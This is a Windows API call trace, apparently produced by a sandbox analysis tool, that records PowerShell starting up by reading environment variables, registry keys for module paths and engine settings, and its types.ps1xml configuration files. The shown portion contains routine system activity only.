	[0508.272] CoTaskMemFree (pv=0x1b6e48b0) 
	[0508.273] CoTaskMemAlloc (cb=0x104) returned 0x1b6e48b0
	[0508.273] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e48b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0508.273] CoTaskMemFree (pv=0x1b6e48b0) 
	[0508.273] CoTaskMemAlloc (cb=0x104) returned 0x1b6e48b0
	[0508.273] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e48b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0508.273] CoTaskMemFree (pv=0x1b6e48b0) 
	[0508.274] CoTaskMemAlloc (cb=0x104) returned 0x1b6e48b0
	[0508.274] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e48b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0508.274] CoTaskMemFree (pv=0x1b6e48b0) 
	[0508.277] CoTaskMemAlloc (cb=0x104) returned 0x1b6e48b0
	[0508.277] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e48b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0508.277] CoTaskMemFree (pv=0x1b6e48b0) 
	[0508.286] CoTaskMemAlloc (cb=0x104) returned 0x1b6e48b0
	[0508.286] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e48b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0508.286] CoTaskMemFree (pv=0x1b6e48b0) 
	[0508.290] CoTaskMemAlloc (cb=0x104) returned 0x1b6e48b0
	[0508.290] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e48b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0508.290] CoTaskMemFree (pv=0x1b6e48b0) 
	[0508.290] CoTaskMemAlloc (cb=0x104) returned 0x1b6e48b0
	[0508.290] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e48b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0508.291] CoTaskMemFree (pv=0x1b6e48b0) 
	[0510.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0511.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0511.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0511.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0511.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0511.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0511.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0511.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0511.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0511.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0511.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0511.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0511.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0511.751] CoTaskMemAlloc (cb=0x104) returned 0x1b6e48b0
	[0511.751] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1b6e48b0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0511.751] CoTaskMemFree (pv=0x1b6e48b0) 
	[0511.753] CoTaskMemAlloc (cb=0xcc) returned 0x3e0090
	[0511.753] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x3e0090, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0511.753] CoTaskMemFree (pv=0x3e0090) 
	[0511.753] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed428 | out: phkResult=0x1ed428*=0x31c) returned 0x0
	[0511.753] RegQueryValueExW (in: hKey=0x31c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1ed3ac, lpData=0x0, lpcbData=0x1ed3a8*=0x0 | out: lpType=0x1ed3ac*=0x2, lpData=0x0, lpcbData=0x1ed3a8*=0x6c) returned 0x0
	[0511.753] CoTaskMemAlloc (cb=0x70) returned 0x382160
	[0511.753] RegQueryValueExW (in: hKey=0x31c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1ed37c, lpData=0x382160, lpcbData=0x1ed378*=0x6c | out: lpType=0x1ed37c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x1ed378*=0x6c) returned 0x0
	[0511.753] CoTaskMemFree (pv=0x382160) 
	[0511.753] CoTaskMemAlloc (cb=0xcc) returned 0x3e0090
	[0511.753] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x3e0090, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0511.753] CoTaskMemFree (pv=0x3e0090) 
	[0511.753] CoTaskMemAlloc (cb=0xcc) returned 0x3e0090
	[0511.753] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x3e0090, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0511.753] CoTaskMemFree (pv=0x3e0090) 
	[0511.756] RegCloseKey (hKey=0x31c) returned 0x0
	[0511.756] CoTaskMemAlloc (cb=0xcc) returned 0x3e0090
	[0511.756] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x3e0090, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0511.756] CoTaskMemFree (pv=0x3e0090) 
	[0511.756] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed428 | out: phkResult=0x1ed428*=0x31c) returned 0x0
	[0511.757] RegQueryValueExW (in: hKey=0x31c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1ed3ac, lpData=0x0, lpcbData=0x1ed3a8*=0x0 | out: lpType=0x1ed3ac*=0x0, lpData=0x0, lpcbData=0x1ed3a8*=0x0) returned 0x2
	[0511.757] RegCloseKey (hKey=0x31c) returned 0x0
	[0511.760] CoTaskMemAlloc (cb=0x20c) returned 0x3d3f70
	[0511.760] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3d3f70 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0511.761] CoTaskMemFree (pv=0x3d3f70) 
	[0511.761] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1ecfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0511.762] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0511.771] CoTaskMemAlloc (cb=0x104) returned 0x1b6e48b0
	[0511.771] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e48b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0511.772] CoTaskMemFree (pv=0x1b6e48b0) 
	[0511.773] CoTaskMemAlloc (cb=0x104) returned 0x1b6e48b0
	[0511.773] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e48b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0511.774] CoTaskMemFree (pv=0x1b6e48b0) 
	[0512.421] CoTaskMemAlloc (cb=0x104) returned 0x1b6e48b0
	[0512.421] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e48b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0512.421] CoTaskMemFree (pv=0x1b6e48b0) 
	[0512.421] CoTaskMemAlloc (cb=0x104) returned 0x1b6e48b0
	[0512.421] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e48b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0512.422] CoTaskMemFree (pv=0x1b6e48b0) 
	[0512.423] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed218 | out: phkResult=0x1ed218*=0x324) returned 0x0
	[0512.425] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0x1ed22c, lpData=0x0, lpcbData=0x1ed228*=0x0 | out: lpType=0x1ed22c*=0x1, lpData=0x0, lpcbData=0x1ed228*=0x74) returned 0x0
	[0512.425] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0x1ed19c, lpData=0x0, lpcbData=0x1ed198*=0x0 | out: lpType=0x1ed19c*=0x1, lpData=0x0, lpcbData=0x1ed198*=0x74) returned 0x0
	[0512.425] CoTaskMemAlloc (cb=0x78) returned 0x382160
	[0512.425] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0x1ed16c, lpData=0x382160, lpcbData=0x1ed168*=0x74 | out: lpType=0x1ed16c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x1ed168*=0x74) returned 0x0
	[0512.425] CoTaskMemFree (pv=0x382160) 
	[0512.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x1ecee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0512.425] SetErrorMode (uMode=0x1) returned 0x1
	[0512.425] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1ed0f0 | out: lpFileInformation=0x1ed0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0512.426] SetErrorMode (uMode=0x1) returned 0x1
	[0512.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0512.428] SetErrorMode (uMode=0x1) returned 0x1
	[0512.429] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed0f0 | out: lpFileInformation=0x1ed0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0512.429] SetErrorMode (uMode=0x1) returned 0x1
	[0512.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0512.433] SetErrorMode (uMode=0x1) returned 0x1
	[0512.433] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed0f0 | out: lpFileInformation=0x1ed0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0512.433] SetErrorMode (uMode=0x1) returned 0x1
	[0512.437] CoTaskMemAlloc (cb=0x104) returned 0x1b6e48b0
	[0512.437] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e48b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0512.437] CoTaskMemFree (pv=0x1b6e48b0) 
	[0512.445] CoTaskMemAlloc (cb=0x104) returned 0x1b6e48b0
	[0512.446] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e48b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0512.446] CoTaskMemFree (pv=0x1b6e48b0) 
	[0512.447] GetACP () returned 0x4e4
	[0512.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0512.455] SetErrorMode (uMode=0x1) returned 0x1
	[0512.455] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328
	[0512.455] GetFileType (hFile=0x328) returned 0x1
	[0512.456] SetErrorMode (uMode=0x1) returned 0x1
	[0512.456] GetFileType (hFile=0x328) returned 0x1
	[0512.457] ReadFile (in: hFile=0x328, lpBuffer=0x2deca18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2deca18*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0512.459] ReadFile (in: hFile=0x328, lpBuffer=0x2deca18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2deca18*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0512.460] ReadFile (in: hFile=0x328, lpBuffer=0x2deca18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2deca18*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0512.460] ReadFile (in: hFile=0x328, lpBuffer=0x2deca18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2deca18*, lpNumberOfBytesRead=0x1ed028*=0xcf3, lpOverlapped=0x0) returned 1
	[0512.460] ReadFile (in: hFile=0x328, lpBuffer=0x2debe73, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2debe73*, lpNumberOfBytesRead=0x1ed028*=0x0, lpOverlapped=0x0) returned 1
	[0512.460] ReadFile (in: hFile=0x328, lpBuffer=0x2deca18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2deca18*, lpNumberOfBytesRead=0x1ed028*=0x0, lpOverlapped=0x0) returned 1
	[0513.154] CloseHandle (hObject=0x328) returned 1
	[0513.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0513.158] SetErrorMode (uMode=0x1) returned 0x1
	[0513.158] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ecfa0 | out: lpFileInformation=0x1ecfa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0513.158] SetErrorMode (uMode=0x1) returned 0x1
	[0513.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1eccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0513.160] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed088 | out: phkResult=0x1ed088*=0x328) returned 0x0
	[0513.160] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed00c, lpData=0x0, lpcbData=0x1ed008*=0x0 | out: lpType=0x1ed00c*=0x1, lpData=0x0, lpcbData=0x1ed008*=0x56) returned 0x0
	[0513.160] CoTaskMemAlloc (cb=0x5a) returned 0x1b6e7470
	[0513.160] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecfdc, lpData=0x1b6e7470, lpcbData=0x1ecfd8*=0x56 | out: lpType=0x1ecfdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ecfd8*=0x56) returned 0x0
	[0513.161] CoTaskMemFree (pv=0x1b6e7470) 
	[0513.161] RegCloseKey (hKey=0x328) returned 0x0
	[0513.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1eccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0513.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0514.407] GetSystemInfo (in: lpSystemInfo=0x1ebcc0 | out: lpSystemInfo=0x1ebcc0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0514.408] VirtualQuery (in: lpAddress=0x1ebd70, lpBuffer=0x1ecc30, dwLength=0x30 | out: lpBuffer=0x1ecc30*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0515.758] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0515.759] GetFileType (hFile=0x324) returned 0x1
	[0515.759] SetErrorMode (uMode=0x1) returned 0x1
	[0515.759] GetFileType (hFile=0x324) returned 0x1
	[0515.759] ReadFile (in: hFile=0x324, lpBuffer=0x2cc20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2cc20e0*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0515.759] ReadFile (in: hFile=0x324, lpBuffer=0x2cc20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2cc20e0*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0515.759] ReadFile (in: hFile=0x324, lpBuffer=0x2cc20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2cc20e0*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0515.759] ReadFile (in: hFile=0x324, lpBuffer=0x2cc20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2cc20e0*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0515.760] ReadFile (in: hFile=0x324, lpBuffer=0x2cc20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2cc20e0*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0515.760] ReadFile (in: hFile=0x324, lpBuffer=0x2cc20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2cc20e0*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
